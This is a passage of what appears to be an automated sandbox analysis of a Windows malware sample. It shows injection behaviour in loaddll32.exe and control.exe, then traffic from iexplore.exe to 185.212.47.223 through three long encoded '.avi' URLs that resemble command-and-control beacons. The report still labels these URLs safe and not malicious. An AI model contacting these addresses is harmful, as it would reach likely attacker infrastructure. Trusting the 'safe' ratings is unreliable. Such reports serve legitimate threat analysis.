  |           +-- csc.exe (started)
  |           |     Dropped: C:\Users\user\AppData\Local\...\5ycfw01g.dll (PE32)
  |           |     +-- cvtres.exe (started)
  |           +-- csc.exe (started)
  |           |     Dropped: C:\Users\user\AppData\Local\...\xxfxarla.dll (PE32)
  |           |     +-- cvtres.exe (started)
  |           +-- conhost.exe (started)
  +-- loaddll32.exe (started)
  |     Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 4 other signatures
  |     +-- control.exe (started)
  |     |     Signatures: Changes memory attributes in foreign processes to executable or writable; Allocates memory in foreign processes; Maps a DLL or memory area into another process
  |     |     +-- rundll32.exe (started)
  |     +-- WerFault.exe (started)
  +-- iexplore.exe (started)
  |     +-- iexplore.exe (started)
  |     |     DNS/IP: 185.212.47.223, ports 49766, 49767, 49769, SERVINGADE, Sweden
  |     +-- iexplore.exe (started)
  |     +-- iexplore.exe (started)
  +-- iexplore.exe (started)
        +-- iexplore.exe (started)

Contacted Public IPs

IP              Domain   Country  ASN    ASN Name    Malicious
185.212.47.223  unknown  Sweden   39378  SERVINGADE  false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
resolver1.opendns.com 208.67.222.222 true
1.0.0.127.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown

Contacted URLs

Name / Malicious / Antivirus Detection / Reputation

http://185.212.47.223/images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown

http://185.212.47.223/images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown

http://185.212.47.223/images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown